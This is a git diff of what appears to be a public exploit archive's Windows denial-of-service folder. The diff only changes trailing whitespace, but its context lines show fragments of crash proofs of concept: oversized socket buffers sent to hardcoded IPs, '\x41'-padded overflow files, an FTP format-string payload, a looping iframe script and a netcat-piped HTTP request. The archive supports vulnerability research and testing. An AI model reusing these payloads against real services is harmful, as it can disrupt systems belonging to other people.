6aecc295b..9e6b49e03 100755 --- a/platforms/windows/dos/24208.c +++ b/platforms/windows/dos/24208.c @@ -52,4 +52,4 @@ int main(int argc, char *argv[]) close(sockfd); } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/24281.pl b/platforms/windows/dos/24281.pl index fa32b46a4..ffd70f93f 100755 --- a/platforms/windows/dos/24281.pl +++ b/platforms/windows/dos/24281.pl @@ -68,5 +68,4 @@ sub converthex ############################# # End code -############################# - +############################# \ No newline at end of file diff --git a/platforms/windows/dos/24343.txt b/platforms/windows/dos/24343.txt index 043d0b3f6..333978ba6 100755 --- a/platforms/windows/dos/24343.txt +++ b/platforms/windows/dos/24343.txt @@ -38,4 +38,4 @@ q :run nc %1 %PORT% < http.tmp -del http.tmp +del http.tmp \ No newline at end of file diff --git a/platforms/windows/dos/24395.txt b/platforms/windows/dos/24395.txt index 9ee07ec01..e8a0c7d18 100755 --- a/platforms/windows/dos/24395.txt +++ b/platforms/windows/dos/24395.txt @@ -11,7 +11,4 @@ while(true) { document.write("<iframe src=\"C:\Windows\system32\"></iframe>"); } -</scr1pt> - - - +</scr1pt> \ No newline at end of file diff --git a/platforms/windows/dos/24411.c b/platforms/windows/dos/24411.c index d2857a57b..567deb9f7 100755 --- a/platforms/windows/dos/24411.c +++ b/platforms/windows/dos/24411.c @@ -37,4 +37,4 @@ zwsetvaluekey_TYPE my_ZwSetValueKey; } } -} +} \ No newline at end of file diff --git a/platforms/windows/dos/24412.c b/platforms/windows/dos/24412.c index 682cfe9bb..e2f950cad 100755 --- a/platforms/windows/dos/24412.c +++ b/platforms/windows/dos/24412.c @@ -81,5 +81,4 @@ main(int argc, char *argv[]) return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/24437.py b/platforms/windows/dos/24437.py index 782c61c7b..f82aee154 100755 --- a/platforms/windows/dos/24437.py +++ b/platforms/windows/dos/24437.py @@ -91,5 +91,4 @@ buff += "\x42" buff += "\x58\x58\x58\x58" f = open('buggy.qtif','w') f.write(buff) -f.close() - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/24448.svg b/platforms/windows/dos/24448.svg index 6b5b80656..4d3bfb4ad 100755 --- a/platforms/windows/dos/24448.svg +++ b/platforms/windows/dos/24448.svg @@ -79,4 +79,4 @@ Opera_6b430000!OpGetNextUninstallFile+0xf8583: */ ]]></script> -</svg> +</svg> \ No newline at end of file diff --git a/platforms/windows/dos/24463.txt b/platforms/windows/dos/24463.txt index d7b12f427..a19802380 100755 --- a/platforms/windows/dos/24463.txt +++ b/platforms/windows/dos/24463.txt @@ -12,5 +12,4 @@ # Reference: http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70 # Reference: http://secunia.com/advisories/51602 -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24463.py - +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24463.py \ No newline at end of file diff --git a/platforms/windows/dos/24485.txt b/platforms/windows/dos/24485.txt index 9da6abaa7..87085e370 100755 --- a/platforms/windows/dos/24485.txt +++ b/platforms/windows/dos/24485.txt @@ -141,4 +141,4 @@ scene from a Hollywood movie.\" <- That's what we're going to do!\n"); } return EXIT_SUCCESS; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/24511.txt b/platforms/windows/dos/24511.txt index 77e07b908..b2ad92744 100755 --- a/platforms/windows/dos/24511.txt +++ b/platforms/windows/dos/24511.txt @@ -708,6 +708,4 @@ License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. - - +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. \ No newline at end of file diff --git a/platforms/windows/dos/24556.py b/platforms/windows/dos/24556.py index 8831f42b8..804c305c2 100755 --- a/platforms/windows/dos/24556.py +++ b/platforms/windows/dos/24556.py @@ -17,7 +17,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - - - + print "File cannot be created" \ No newline at end of file diff --git a/platforms/windows/dos/24618.c b/platforms/windows/dos/24618.c index 89835b4c2..4a3dde43e 100755 --- a/platforms/windows/dos/24618.c +++ b/platforms/windows/dos/24618.c @@ -154,5 +154,4 @@ u_long resolv(char *host) { perror("\nError"); exit(1); } -#endif - +#endif \ No newline at end of file diff --git a/platforms/windows/dos/24620.c b/platforms/windows/dos/24620.c index 24757112c..ae4e8c023 100755 --- a/platforms/windows/dos/24620.c +++ b/platforms/windows/dos/24620.c @@ -146,6 +146,4 @@ u_long resolv(char *host) { perror("\nError"); exit(1); } -#endif - - +#endif \ No newline at end of file diff --git a/platforms/windows/dos/24634.c b/platforms/windows/dos/24634.c index aa6e8499b..6b6b09d48 100755 --- a/platforms/windows/dos/24634.c +++ b/platforms/windows/dos/24634.c @@ -230,4 +230,4 @@ int main(int argc, char *argv[]) fflush(stdout); printf("\nDONE\n"); fflush(stdout); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/24635.c b/platforms/windows/dos/24635.c index 79cb2aadc..7fd0cd657 100755 --- a/platforms/windows/dos/24635.c +++ b/platforms/windows/dos/24635.c @@ -240,6 +240,4 @@ int main(int argc, char *argv[]) } printf("\nDONE\n"); fflush(stdout); -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/24636.c b/platforms/windows/dos/24636.c index 3ef793cf3..f276432d3 100755 --- a/platforms/windows/dos/24636.c +++ b/platforms/windows/dos/24636.c @@ -374,5 +374,4 @@ int main(int argc, char* argv[]) netwib_close(); return(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/24637.c b/platforms/windows/dos/24637.c index e806724ff..381f28984 100755 --- a/platforms/windows/dos/24637.c +++ b/platforms/windows/dos/24637.c @@ -375,5 +375,4 @@ int main(int argc, char* argv[]) netwib_close(); return(0); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/24640.c b/platforms/windows/dos/24640.c index 4e7d7c46a..b4050bc5c 100755 --- a/platforms/windows/dos/24640.c +++ b/platforms/windows/dos/24640.c @@ -103,5 +103,4 @@ int main(int argc, char **argv) close(sockfd); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/24733.pl b/platforms/windows/dos/24733.pl index c9658bd66..a15a979bc 100755 --- a/platforms/windows/dos/24733.pl +++ b/platforms/windows/dos/24733.pl @@ -25,4 +25,4 @@ print $socks "\n"; select(undef, undef, undef, 0.1); } print "\nMessenger crashed."; -close $socks; +close $socks; \ No newline at end of file diff --git a/platforms/windows/dos/24738.c b/platforms/windows/dos/24738.c index 25c4dc1e1..60c3a169a 100755 --- a/platforms/windows/dos/24738.c +++ b/platforms/windows/dos/24738.c @@ -85,4 +85,4 @@ cout<<"������� ========Remote Crafted String Vulnerability======== cout<<"������� ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl; cout<<"������� ============================================================="<<endl; cout<<"������������������������������������������������������������������ "<<endl; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/24741.txt b/platforms/windows/dos/24741.txt index 18b47eb67..ef3f4faf0 100755 --- a/platforms/windows/dos/24741.txt +++ b/platforms/windows/dos/24741.txt @@ -264,6 +264,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or support -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/dos/24770.py b/platforms/windows/dos/24770.py index 989eb79fe..66ded388a 100755 --- a/platforms/windows/dos/24770.py +++ b/platforms/windows/dos/24770.py @@ -13,4 +13,4 @@ if not cl.connect(server=('192.168.10.138',5222)): raise IOError('Can not connect to server.') if not cl.auth(name,'jabberuserpassword','optional resource name'): raise IOError('Can not auth with server.') -cl.disconnect() +cl.disconnect() \ No newline at end of file diff --git a/platforms/windows/dos/24880.pl b/platforms/windows/dos/24880.pl index a9f7538ba..223899f34 100755 --- a/platforms/windows/dos/24880.pl +++ b/platforms/windows/dos/24880.pl @@ -15,4 +15,4 @@ my $junk = "\x41" x 30000000; open($FILE,">$file"); print $FILE $junk; close($FILE); -print "File Created successfully\n"; +print "File Created successfully\n"; \ No newline at end of file diff --git a/platforms/windows/dos/24918.py b/platforms/windows/dos/24918.py index 64fe91be8..e36a62e86 100755 --- a/platforms/windows/dos/24918.py +++ b/platforms/windows/dos/24918.py @@ -18,4 +18,4 @@ buffer += " HTTP/1.1\r\n\r\n" sock.send(buffer) -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/dos/24952.py b/platforms/windows/dos/24952.py index 0f773665d..7c1314b46 100755 --- a/platforms/windows/dos/24952.py +++ b/platforms/windows/dos/24952.py @@ -45,4 +45,4 @@ buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -s.sendto(buffer, (host, port)) +s.sendto(buffer, (host, port)) \ No newline at end of file diff --git a/platforms/windows/dos/24962.txt b/platforms/windows/dos/24962.txt index ac78fce16..e3ccf5941 100755 --- a/platforms/windows/dos/24962.txt +++ b/platforms/windows/dos/24962.txt @@ -26,5 +26,4 @@ Disasm:0055EB70 |> \33C0 |XOR EAX,EAX Advisory: http://www.fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042-EN.xml Exploit PoC: http://fuzzmyapp.com/advisories/FMA-2012-042/FMA-2012-042.pdf - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24962.pdf - + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24962.pdf \ No newline at end of file diff --git a/platforms/windows/dos/24968.rb b/platforms/windows/dos/24968.rb index 4f4afadfb..a78bcec89 100755 --- a/platforms/windows/dos/24968.rb +++ b/platforms/windows/dos/24968.rb @@ -39,5 +39,4 @@ class Metasploit3 < Msf::Auxiliary udp_sock.put(pkt) disconnect_udp end -end - +end \ No newline at end of file diff --git a/platforms/windows/dos/24972.c b/platforms/windows/dos/24972.c index 3a1a9d2de..cc52aee43 100755 --- a/platforms/windows/dos/24972.c +++ b/platforms/windows/dos/24972.c @@ -193,6 +193,4 @@ int main(int argc, char **argv) fgfswrite(sock, "quit"); fgfsclose(sock); return EXIT_SUCCESS; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/25012.c b/platforms/windows/dos/25012.c index fb6689d91..d79f65d1d 100755 --- a/platforms/windows/dos/25012.c +++ b/platforms/windows/dos/25012.c @@ -46,5 +46,4 @@ int main(int argc, char **argv){ /* execute the poor victim */ execve(cmd, args, environ); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/25063.pl b/platforms/windows/dos/25063.pl index 90fb55c01..27832f7d9 100755 --- a/platforms/windows/dos/25063.pl +++ b/platforms/windows/dos/25063.pl @@ -15,5 +15,4 @@ my $payload="%s"x115; my $ftp = Net::FTP->new("127.0.0.1", Debug => 1); $ftp->login("anonymous","123@123.com"); -$ftp->quot("CWD",$payload); - +$ftp->quot("CWD",$payload); \ No newline at end of file diff --git a/platforms/windows/dos/25218.pl b/platforms/windows/dos/25218.pl index a6cb52af6..e4f98a65c 100755 --- a/platforms/windows/dos/25218.pl +++ b/platforms/windows/dos/25218.pl @@ -38,4 +38,4 @@ print "server is down. now run forest, RUN!\n"; sub syntax { print "\nUsage: pftpdos1.pl IP\n"; exit (1); - } + } \ No newline at end of file diff --git a/platforms/windows/dos/2523.pl b/platforms/windows/dos/2523.pl index 521deec9d..9420ba8e7 100755 --- a/platforms/windows/dos/2523.pl +++ b/platforms/windows/dos/2523.pl @@ -461,4 +461,4 @@ my $ppt= close FILE; print "Create Nanika.ppt OK!" -# milw0rm.com [2006-10-12] +# milw0rm.com [2006-10-12] \ No newline at end of file diff --git a/platforms/windows/dos/25326.txt b/platforms/windows/dos/25326.txt index 36bc3570c..80580128c 100755 --- a/platforms/windows/dos/25326.txt +++ b/platforms/windows/dos/25326.txt @@ -84,6 +84,4 @@ ASName= 78 78 78 78 78 78 78 78 78 78 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ------------------------snip----------------------- - - +-----------------------snip----------------------- \ No newline at end of file diff --git a/platforms/windows/dos/25329.cfg b/platforms/windows/dos/25329.cfg index 6d7f7e657..d0da5dbc2 100755 --- a/platforms/windows/dos/25329.cfg +++ b/platforms/windows/dos/25329.cfg @@ -8,4 +8,4 @@ A buffer overflow is present in Jedi Academy that can be exploited remotely by c // web: http://aluigi.altervista.org // Ref: http://aluigi.altervista.org/adv/jamsgbof-adv.txt -say aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +say aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \ No newline at end of file diff --git a/platforms/windows/dos/25364.txt b/platforms/windows/dos/25364.txt index 43c4bb662..60a00a766 100755 --- a/platforms/windows/dos/25364.txt +++ b/platforms/windows/dos/25364.txt @@ -9,4 +9,4 @@ The attacker can issue a malformed HTTP GET command including excessive data as AN HTTPD 1.42n is reported vulnerable, however, it is possible that other versions are affected as well. GET /scripts/cmdIS.dll/cgi-bin/test.bat HTTP/1.0 -user-agent: aaaaaaaaaaaaaaaaaaaaaa [approx 8300 characters] aaaaaaaaaaaaaaaaaaaa... +user-agent: aaaaaaaaaaaaaaaaaaaaaa [approx 8300 characters] aaaaaaaaaaaaaaaaaaaa... \ No newline at end of file diff --git a/platforms/windows/dos/25383.pl b/platforms/windows/dos/25383.pl index c2dc80456..dd17b4501 100755 --- a/platforms/windows/dos/25383.pl +++ b/platforms/windows/dos/25383.pl @@ -27,4 +27,4 @@ my $frame = Net::Packet::Frame->new( ), ); -$frame->send for 1..5; +$frame->send for 1..5; \ No newline at end of file diff --git a/platforms/windows/dos/25472.py b/platforms/windows/dos/25472.py index 150f943de..df2eb6c69 100755 --- a/platforms/windows/dos/25472.py +++ b/platforms/windows/dos/25472.py @@ -21,4 +21,4 @@ import socket new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) new.connect(('192.168.1.19', 69)) new.send('\x41'*510) -#end of python file +#end of python file \ No newline at end of file diff --git a/platforms/windows/dos/25611.txt b/platforms/windows/dos/25611.txt index 4d9a58708..a99a43a47 100755 --- a/platforms/windows/dos/25611.txt +++ b/platforms/windows/dos/25611.txt @@ -364,4 +364,4 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...) fflush(stderr); return TRUE; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/25629.pl b/platforms/windows/dos/25629.pl index 930e733e9..d3011b20c 100755 --- a/platforms/windows/dos/25629.pl +++ b/platforms/windows/dos/25629.pl @@ -48,4 +48,4 @@ sub useage () print "Useage: $0 <Host> <Port> <Username> <Password>\n"; exit; } -#Coded By Samsta http://theshelljunkies.clawz.com +#Coded By Samsta http://theshelljunkies.clawz.com \ No newline at end of file diff --git a/platforms/windows/dos/2571.pl b/platforms/windows/dos/2571.pl index 2bd1e60b1..165466a88 100755 --- a/platforms/windows/dos/2571.pl +++ b/platforms/windows/dos/2571.pl @@ -83,4 +83,4 @@ close($socket); print "client has died h00ha \n"; -# milw0rm.com [2006-10-16] +# milw0rm.com [2006-10-16] \ No newline at end of file diff --git a/platforms/windows/dos/25714.txt b/platforms/windows/dos/25714.txt index a5010d938..46c6d84d9 100755 --- a/platforms/windows/dos/25714.txt +++ b/platforms/windows/dos/25714.txt @@ -90,4 +90,4 @@ function run() <input language=JavaScript onclick=run() type=button value="Test"> </center> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/25719.txt b/platforms/windows/dos/25719.txt index 8c913ead1..178e2b597 100755 --- a/platforms/windows/dos/25719.txt +++ b/platforms/windows/dos/25719.txt @@ -279,6 +279,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or support -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/dos/25911.py b/platforms/windows/dos/25911.py index 157f07358..1fa062f3d 100755 --- a/platforms/windows/dos/25911.py +++ b/platforms/windows/dos/25911.py @@ -60,4 +60,4 @@ try: except: - print "[+] Machine indisponible, verifiez le port ou l'ip." + print "[+] Machine indisponible, verifiez le port ou l'ip." \ No newline at end of file diff --git a/platforms/windows/dos/25936.pl b/platforms/windows/dos/25936.pl index a26a6ec39..c07a37354 100755 --- a/platforms/windows/dos/25936.pl +++ b/platforms/windows/dos/25936.pl @@ -51,5 +51,4 @@ close($socket); else { print "[-] Impossible de se connecter sur $ARGV[0]:$ARGV[1]\n"; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/25972.py b/platforms/windows/dos/25972.py index d9b1ebf6b..7b4cbcf67 100755 --- a/platforms/windows/dos/25972.py +++ b/platforms/windows/dos/25972.py @@ -89,4 +89,4 @@ header += "PE" header += "A"*235 f = open('POC.exe','wb') f.write(header) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/26005.pl b/platforms/windows/dos/26005.pl index eeceff09e..faac25573 100755 --- a/platforms/windows/dos/26005.pl +++ b/platforms/windows/dos/26005.pl @@ -22,5 +22,4 @@ print $sock "a001 CREATE $a\r\n"; while (<$sock>) { print $_; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/26010.py b/platforms/windows/dos/26010.py index 0f4adc188..1793616dc 100755 --- a/platforms/windows/dos/26010.py +++ b/platforms/windows/dos/26010.py @@ -22,4 +22,4 @@ pwn += "\x00" address = ('192.168.200.20', 69) server_socket = socket(AF_INET, SOCK_DGRAM) -server_socket.sendto(pwn, address) +server_socket.sendto(pwn, address) \ No newline at end of file diff --git a/platforms/windows/dos/26130.py b/platforms/windows/dos/26130.py index 6947dd3a3..634d62dd3 100755 --- a/platforms/windows/dos/26130.py +++ b/platforms/windows/dos/26130.py @@ -31,4 +31,4 @@ pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #passw address = ('192.168.200.20', 1812) server_socket = socket(AF_INET, SOCK_DGRAM) -server_socket.sendto(pwn, address) +server_socket.sendto(pwn, address) \ No newline at end of file diff --git a/platforms/windows/dos/26133.py b/platforms/windows/dos/26133.py index 0f6f17e1b..0b6498122 100755 --- a/platforms/windows/dos/26133.py +++ b/platforms/windows/dos/26133.py @@ -42,4 +42,4 @@ print("[-] Sending exploit...\n") s.send("RETR " + PAYLOAD + '\r\n') s.close() -print("[!] Done! Exploit successfully sent\n") +print("[!] Done! Exploit successfully sent\n") \ No newline at end of file diff --git a/platforms/windows/dos/26194.txt b/platforms/windows/dos/26194.txt index a56d00528..74e3bde4b 100755 --- a/platforms/windows/dos/26194.txt +++ b/platforms/windows/dos/26194.txt @@ -16,5 +16,4 @@ USER=username PASS=password [FILES] -"1","/winis/ApiList.zip","477,839","E:\ApiList.zip" - +"1","/winis/ApiList.zip","477,839","E:\ApiList.zip" \ No newline at end of file diff --git a/platforms/windows/dos/26214.py b/platforms/windows/dos/26214.py index b596e0d98..2300dc9e4 100755 --- a/platforms/windows/dos/26214.py +++ b/platforms/windows/dos/26214.py @@ -23,4 +23,4 @@ filename="string.txt" buffer = "\x41" * 1000 textfile = open(filename , 'w') textfile.write(buffer) -textfile.close() +textfile.close() \ No newline at end of file diff --git a/platforms/windows/dos/26219.c b/platforms/windows/dos/26219.c index 03773ba90..6acfa79e4 100755 --- a/platforms/windows/dos/26219.c +++ b/platforms/windows/dos/26219.c @@ -93,4 +93,4 @@ printf("%s","[*] Stuff sent, now wait for 30-120 seconds,\nserver should crash, close(s); return 0; -}} +}} \ No newline at end of file diff --git a/platforms/windows/dos/26220.c b/platforms/windows/dos/26220.c index ecb3df991..5ecad5051 100755 --- a/platforms/windows/dos/26220.c +++ b/platforms/windows/dos/26220.c @@ -92,5 +92,4 @@ int main(void) printf("Ending program in %d seconds...\n", SLEEP_TIME/1000); Sleep(SLEEP_TIME); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/2625.c b/platforms/windows/dos/2625.c index 7911c59e2..ac51267da 100755 --- a/platforms/windows/dos/2625.c +++ b/platforms/windows/dos/2625.c @@ -160,4 +160,4 @@ if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) WSACleanup(); } -// milw0rm.com [2006-10-23] +// milw0rm.com [2006-10-23] \ No newline at end of file diff --git a/platforms/windows/dos/2629.html b/platforms/windows/dos/2629.html index 81338db20..fdecd0ff9 100755 --- a/platforms/windows/dos/2629.html +++ b/platforms/windows/dos/2629.html @@ -28,4 +28,4 @@ try { a.Execute(b,b,b); } catch(e) {} <center><h1>WOW!!! Are U live?</h1></center> </body></html> -# milw0rm.com [2006-10-24] +# milw0rm.com [2006-10-24] \ No newline at end of file diff --git a/platforms/windows/dos/26322.pl b/platforms/windows/dos/26322.pl index 6e66df19f..d575d607c 100755 --- a/platforms/windows/dos/26322.pl +++ b/platforms/windows/dos/26322.pl @@ -18,4 +18,4 @@ $BOF = "\x41" x 5000; open(myfile, '> MusicBee _EXP.m3u'); -print myfile $HEADER.$BOF; +print myfile $HEADER.$BOF; \ No newline at end of file diff --git a/platforms/windows/dos/2650.c b/platforms/windows/dos/2650.c index 6d25e4183..dd8c78fd3 100755 --- a/platforms/windows/dos/2650.c +++ b/platforms/windows/dos/2650.c @@ -225,4 +225,4 @@ if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) WSACleanup(); } -// milw0rm.com [2006-10-25] +// milw0rm.com [2006-10-25] \ No newline at end of file diff --git a/platforms/windows/dos/26555.txt b/platforms/windows/dos/26555.txt index 22c74c00c..01c50b5fb 100755 --- a/platforms/windows/dos/26555.txt +++ b/platforms/windows/dos/26555.txt @@ -62,4 +62,4 @@ </script> <!--088241c155f232f70fcae7020157b9dcff210b84--> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/26665.pl b/platforms/windows/dos/26665.pl index 57f169506..f4a9884ae 100755 --- a/platforms/windows/dos/26665.pl +++ b/platforms/windows/dos/26665.pl @@ -53,6 +53,4 @@ $sock->recv($buff,32768); $str='\x06'.'\x04'.'\0xffffffc0'x300; $sock->send($str x 50); -close $sock; - - +close $sock; \ No newline at end of file diff --git a/platforms/windows/dos/26690.c b/platforms/windows/dos/26690.c index 882820f33..513401d6d 100755 --- a/platforms/windows/dos/26690.c +++ b/platforms/windows/dos/26690.c @@ -173,5 +173,4 @@ char* chProcess = argv[1]; FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/2672.py b/platforms/windows/dos/2672.py index dd195c494..7ee5623c6 100755 --- a/platforms/windows/dos/2672.py +++ b/platforms/windows/dos/2672.py @@ -40,4 +40,4 @@ s.close() # EoF -# milw0rm.com [2006-10-28] +# milw0rm.com [2006-10-28] \ No newline at end of file diff --git a/platforms/windows/dos/26733.py b/platforms/windows/dos/26733.py index 443203cfe..ee6f52b44 100755 --- a/platforms/windows/dos/26733.py +++ b/platforms/windows/dos/26733.py @@ -17,4 +17,4 @@ try: rst.close() print("\nFile Sampah Masyarakat dibuat !\n") except: - print "Gagal" + print "Gagal" \ No newline at end of file diff --git a/platforms/windows/dos/26769.txt b/platforms/windows/dos/26769.txt index c1c64d3bd..dd8191d0c 100755 --- a/platforms/windows/dos/26769.txt +++ b/platforms/windows/dos/26769.txt @@ -13,5 +13,4 @@ The following is a proof-of-concept example segment of an Excel data file. The ' 00000760 18 00 1b 00 00 00 00 05 07 ** ** 00 00 00 00 00 |................| 00000770 00 00 00 54 45 53 54 31 3a 00 00 00 00 00 00 c1 |...TEST1:.......| 00000780 01 08 00 c1 01 00 00 22 be 01 00 fc 00 08 00 00 |......."........| -00000790 00 00 00 00 00 00 00 ff 00 02 00 08 00 63 08 15 |.............c..| - +00000790 00 00 00 00 00 00 00 ff 00 02 00 08 00 63 08 15 |.............c..| \ No newline at end of file diff --git a/platforms/windows/dos/26776.txt b/platforms/windows/dos/26776.txt index b706d8618..1375df244 100755 --- a/platforms/windows/dos/26776.txt +++ b/platforms/windows/dos/26776.txt @@ -6,5 +6,4 @@ Successful exploitation will likely result in a crash of the 'SWS.exe' applicati Sights 'n Sounds Streaming Media Server version 2.0.3.b is affected. -http://www.example.com/MediaServerListing.exe?[long_string] - +http://www.example.com/MediaServerListing.exe?[long_string] \ No newline at end of file diff --git a/platforms/windows/dos/26816.pl b/platforms/windows/dos/26816.pl index 938ef7eaf..259babd8b 100755 --- a/platforms/windows/dos/26816.pl +++ b/platforms/windows/dos/26816.pl @@ -53,5 +53,4 @@ print "[ $l - 8000000000 ]\r"; send($sock,$m,0) || die "Error: Send not found\n"; } print "\nServer DoS Hack\n"; -close($sock); - +close($sock); \ No newline at end of file diff --git a/platforms/windows/dos/2682.pl b/platforms/windows/dos/2682.pl index 049b05db1..78619a9e2 100755 --- a/platforms/windows/dos/2682.pl +++ b/platforms/windows/dos/2682.pl @@ -71,4 +71,4 @@ print "[+] ok - payload sent\n"; ## 29.10.2006 -# milw0rm.com [2006-10-30] +# milw0rm.com [2006-10-30] \ No newline at end of file diff --git a/platforms/windows/dos/27050.txt b/platforms/windows/dos/27050.txt index 87fb8257f..ce40da053 100755 --- a/platforms/windows/dos/27050.txt +++ b/platforms/windows/dos/27050.txt @@ -51,4 +51,4 @@ http://technet.microsoft.com/en-us/security/bulletin/ms13-056 PoC: https://docs.google.com/file/d/0B48gNjWDSsFwSDQ1ZGZEb3ItSEU -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27050.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27050.zip \ No newline at end of file diff --git a/platforms/windows/dos/2708.c b/platforms/windows/dos/2708.c index d503582e0..96b99e36c 100755 --- a/platforms/windows/dos/2708.c 